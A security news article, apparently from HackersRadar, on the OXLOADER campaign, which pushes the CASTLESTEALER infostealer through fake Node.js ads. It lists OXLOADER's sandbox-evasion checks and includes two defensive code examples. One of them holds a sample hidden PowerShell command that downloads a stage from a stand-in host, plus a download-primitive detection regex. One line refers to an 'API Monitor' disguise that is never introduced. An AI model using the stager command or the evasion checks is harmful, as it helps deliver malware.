Google Ads Impersonate Node.js Installer to Deploy Infostealer Malware
Key Takeaways
- Threat actors are leveraging malicious Google Ads to distribute a new malware loader, OXLOADER, disguised as the Node.js installer.
- The campaign primarily targets Windows users in the United States, deploying the sophisticated CASTLESTEALER infostealer after a single click on a deceptive ad.
- OXLOADER employs advanced anti-analysis techniques, including sandbox detection and obfuscation, resulting in extremely low detection rates.
- Google has removed the malicious advertiser account and associated campaigns, but the techniques used highlight a persistent threat to users relying on search engine results for software downloads.
Sophisticated Infostealer Campaign Leverages Malicious Google Ads
A new, highly evasive malware loader, dubbed OXLOADER, is being disseminated through fraudulent Google Ads that impersonate the official Node.js installer. This sophisticated campaign, detailed in a recent security report by Elastic Security Labs, targets Windows users in the United States, surreptitiously installing the dangerous CASTLESTEALER infostealer onto compromised machines.
The attack chain exploits a common user behavior: searching for software online and trusting prominent search results. Threat actors established a convincing, malicious landing page designed to mimic the legitimate Node.js platform. Upon clicking a sponsored ad, victims are covertly redirected through an intermediary domain to download a malicious Windows batch script. This script is hosted on a legitimate cloud file-sharing service, a tactic that significantly reduces its likelihood of being flagged by conventional security tools.
Elastic Security Labs researchers identified this active campaign, confirming it had targeted one of their customers. The report highlighted that OXLOADER was previously undocumented and exhibited remarkably low detection rates across both static antivirus engines and automated sandbox environments.
Campaign Details and Google’s Response
The malicious campaign operated via Google Ads, with the advertiser account registered under a verified name linked to Ukraine. Google took action by May 14, 2026, removing the advertiser and all associated campaigns. The last recorded appearance of the deceptive ad was April 23, 2026.
What makes this particular attack concerning is the seamless integration of threat actors into trusted platforms. This allowed them to deliver their payload without immediately raising alarms. The final payload, CASTLESTEALER, is a .NET-based infostealer designed to harvest sensitive data from infected systems.
Infection Chain and OXLOADER’s Stealth Tactics
The infection process initiates when a user searches for the Node.js installer and clicks on a sponsored Google search result. This action redirects the user to a fake landing page crafted to appear identical to the official Node.js website.
From this deceptive page, an intermediary domain facilitates the download of a malicious batch script. This script is hosted on Storj, a legitimate cloud storage service, deliberately abused by the attackers to bypass reputation-based filtering and enhance the campaign’s stealth.
The batch script further masks its malicious intent by presenting a convincing fake software installation wizard, providing victims with no immediate reason for suspicion. Concurrently, it silently downloads the next-stage executable using PowerShell and triggers a Windows User Account Control (UAC) prompt to gain elevated system privileges. The entire user experience is engineered to mimic a routine software installation, thereby minimizing suspicion.
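The stager behaviour just described (a batch script that uses PowerShell to fetch the next stage and then triggers a UAC prompt) leaves a recognisable trail in process-creation telemetry. The following detector is an added example, not code from the Elastic report or from HackersRadar: it scans Sysmon Event ID 1-style records (the Image, ParentImage, CommandLine, UtcTime, Computer and User field names are Sysmon's; the JSON lines themselves are constructed for this example and are not real indicators) and raises an alert for PowerShell launched from cmd.exe with a download command, escalating severity when a UAC consent.exe launch follows on the same host within a few minutes.

```python
"""
Added example, not from the Elastic report or the HackersRadar article: a small
detector over process-creation events for the batch-script stager behaviour
described in the article (cmd.exe launching PowerShell with a download command,
followed shortly by a UAC consent prompt on the same host). Field names follow
Sysmon Event ID 1; the JSON records below are constructed and are not real IoCs.
"""
import json
import re
from datetime import datetime, timedelta

# PowerShell download primitives a batch-script stager typically relies on.
DOWNLOAD_RE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bcurl\b|\bwget\b|"
    r"DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer)",
    re.IGNORECASE,
)

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Constructed sample events (JSON lines), one record per process creation.
SAMPLE_EVENTS = r"""
{"UtcTime": "2026-04-23 14:02:11", "Computer": "WS-DEV-07", "User": "CORP\\alice", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe /c \"C:\\Users\\alice\\Downloads\\node-setup.bat\""}
{"UtcTime": "2026-04-23 14:02:13", "Computer": "WS-DEV-07", "User": "CORP\\alice", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell -w hidden -c \"iwr https://example.invalid/stage2 -OutFile $env:TEMP\\node.exe\""}
{"UtcTime": "2026-04-23 14:02:40", "Computer": "WS-DEV-07", "User": "NT AUTHORITY\\SYSTEM", "Image": "C:\\Windows\\System32\\consent.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "consent.exe 1234 556 000001F2"}
{"UtcTime": "2026-04-23 15:10:00", "Computer": "WS-DEV-07", "User": "CORP\\alice", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -c \"Get-Process | Sort-Object CPU\""}
{"UtcTime": "2026-04-23 16:00:00", "Computer": "WS-BUILD-02", "User": "CORP\\bob", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "powershell -c \"Get-ChildItem C:\\build\""}
"""


def parse_events(lines):
    """Parse JSON-lines process-creation records; UtcTime becomes a datetime."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["UtcTime"] = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")
        events.append(ev)
    return events


def image_name(path):
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_stager_chains(lines, uac_window=timedelta(minutes=5)):
    """Return one alert per PowerShell download launched from cmd.exe.

    Severity is 'high' when a consent.exe (UAC prompt) launch follows on the
    same host within uac_window, mirroring the elevation step in the article;
    otherwise 'medium'.
    """
    events = parse_events(lines)
    alerts = []
    for ev in events:
        if image_name(ev["Image"]) not in POWERSHELL_IMAGES:
            continue
        if image_name(ev["ParentImage"]) != "cmd.exe":
            continue
        if not DOWNLOAD_RE.search(ev["CommandLine"]):
            continue
        uac_followed = any(
            image_name(e["Image"]) == "consent.exe"
            and e["Computer"] == ev["Computer"]
            and timedelta(0) <= e["UtcTime"] - ev["UtcTime"] <= uac_window
            for e in events
        )
        alerts.append({
            "computer": ev["Computer"],
            "user": ev["User"],
            "time": ev["UtcTime"].isoformat(),
            "command": ev["CommandLine"],
            "uac_prompt_followed": uac_followed,
            "severity": "high" if uac_followed else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_stager_chains(SAMPLE_EVENTS.splitlines()):
        print(alert["severity"], alert["computer"], alert["user"], alert["command"])
```

On the constructed records this yields a single high-severity alert for WS-DEV-07; the admin's interactive `Get-Process` and the build host's `Get-ChildItem` are ignored because they either lack a cmd.exe parent or carry no download primitive. In production the same logic would sit behind an allowlist for known deployment scripts, and the UAC correlation would be keyed on the logon session rather than only the host name.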
A second variant of OXLOADER was discovered on May 13, 2026. This version masqueraded as a Node.js installer binary rather than as API Monitor, maintaining the campaign’s deceptive theme. Researchers noted that the filename intentionally included “node” to reinforce the illusion of a legitimate Node.js download.
How OXLOADER Evades Detection
OXLOADER is engineered with sophisticated evasion capabilities. Before executing its primary malicious functions, it performs five distinct checks to determine whether it is running inside a sandbox or virtual machine: it requires at least three CPU cores, at least 3 GB of physical RAM, and a display refresh rate above 20 Hz, and it confirms that the system is neither located in a CIS region nor configured for the Russian language.
The loader also employs advanced obfuscation techniques that disrupt standard binary analysis tools, making reverse engineering a challenging and time-consuming process. It embeds malicious code within the Windows .reloc section, an area not typically used for executable instructions by legitimate programs. It then unpacks itself in memory using self-modifying decryption routines.
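Because a legitimate relocation table is plain, low-entropy data that the linker marks as initialized, read-only and discardable, a .reloc section that is executable, writable, or filled with high-entropy bytes is a cheap static signal worth checking during triage. The following standard-library PE section inspector is an added example written for this article, not code from Elastic Security Labs or HackersRadar; its thresholds (the section flags it checks and the 7.0 bits-per-byte entropy cut-off) are this example's own heuristics, and the two PE images it examines are built in code rather than taken from any real sample.

```python
"""
Added example, not from the Elastic report or the article: a standard-library
PE section-header parser that flags a .reloc section carrying properties a
genuine relocation table never needs. The heuristics (executable/code/writable
flags, Shannon entropy above 7.0 bits per byte) are this example's own, and the
PE images below are constructed in code rather than taken from any sample.
"""
import hashlib
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_sections(data):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size                      # section headers follow the optional header
    sections = []
    for i in range(nsections):
        f = struct.unpack_from("<8sIIIIIIHHI", data, table + i * 40)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": f[1], "virtual_address": f[2],
                         "raw_size": f[3], "raw_ptr": f[4], "characteristics": f[9]})
    return sections


def shannon_entropy(buf):
    """Bits per byte: near 8.0 for encrypted/compressed data, low for relocation tables."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def inspect_reloc(data):
    """Return the reasons a .reloc section looks abused (empty list when clean)."""
    reasons = []
    for s in parse_sections(data):
        if s["name"] != ".reloc":
            continue
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_EXECUTE:
            reasons.append(".reloc is marked executable")
        if c & IMAGE_SCN_CNT_CODE:
            reasons.append(".reloc is flagged as code")
        if c & IMAGE_SCN_MEM_WRITE:
            reasons.append(".reloc is writable (self-modifying unpacker?)")
        body = data[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        if len(body) >= 256 and shannon_entropy(body) > 7.0:
            reasons.append(".reloc entropy %.2f suggests a packed payload" % shannon_entropy(body))
    return reasons


# --- constructed images for demonstration (not real samples) ----------------
def build_sample_pe(reloc_chars, reloc_payload):
    """Minimal, non-runnable PE32+ image with a .text and a .reloc section."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)            # e_lfanew: PE header right after DOS header
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)            # PE32+ magic
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, len(opt), 0x0022)
    text_raw, reloc_raw = 512, 1024
    text = b"\xC3" * 16                              # a few RET opcodes

    def hdr(name, size, vaddr, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, size, vaddr, size, rawptr, 0, 0, 0, 0, chars)

    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt)
               + hdr(b".text", len(text), 0x1000, text_raw,
                     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
               + hdr(b".reloc", len(reloc_payload), 0x2000, reloc_raw, reloc_chars))
    img = bytearray(reloc_raw + len(reloc_payload))
    img[:len(headers)] = headers
    img[text_raw:text_raw + len(text)] = text
    img[reloc_raw:] = reloc_payload
    return bytes(img)


def legit_reloc_block():
    """One IMAGE_BASE_RELOCATION block with 64 DIR64 entries, as a linker would emit."""
    entries = b"".join(struct.pack("<H", 0xA000 | (0x10 + 8 * k)) for k in range(64))
    return struct.pack("<II", 0x1000, 8 + len(entries)) + entries


def pseudo_random_bytes(n, seed=b"example-seed"):
    """Deterministic high-entropy filler standing in for an encrypted payload."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


CLEAN_IMAGE = build_sample_pe(
    IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_DISCARDABLE,
    legit_reloc_block())
ABUSED_IMAGE = build_sample_pe(
    IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE,
    pseudo_random_bytes(4096))

if __name__ == "__main__":
    print("clean :", inspect_reloc(CLEAN_IMAGE))
    print("abused:", inspect_reloc(ABUSED_IMAGE))
```

Run against a file on disk, `inspect_reloc(open(path, "rb").read())` returns an empty list for a normally linked binary and a list of reasons otherwise. The entropy test is the one to tune: a packer that stores its stub unencrypted in .reloc will pass it, while a section marked executable is suspicious regardless of content, so the flag checks should carry more weight than the entropy score.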
The ultimate payload, CASTLESTEALER, is delivered entirely in memory using DonutLoader, an open-source shellcode generator. This in-memory execution strategy leaves minimal traces on disk, further complicating detection and forensic analysis.
What You Should Do
- Exercise Extreme Caution with Sponsored Search Results: Treat sponsored search results for developer tools and other software with heightened scrutiny. Malicious actors frequently exploit advertising platforms.
- Verify Software Downloads: Always download software directly from official vendor websites. Do not rely solely on search engine results, even if they appear at the top.
- Enable and Configure Endpoint Security: Ensure endpoint behavioral detection is actively enabled and configured for prevention, not just monitoring. This can help identify and block suspicious activities even if initial files evade static detection.
- Implement Network Traffic Monitoring: Monitor network traffic for unusual connections or data exfiltration attempts, especially from newly installed applications.
- Educate Users: Regularly train developers and other employees on the risks of malvertising and the importance of verifying software sources.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.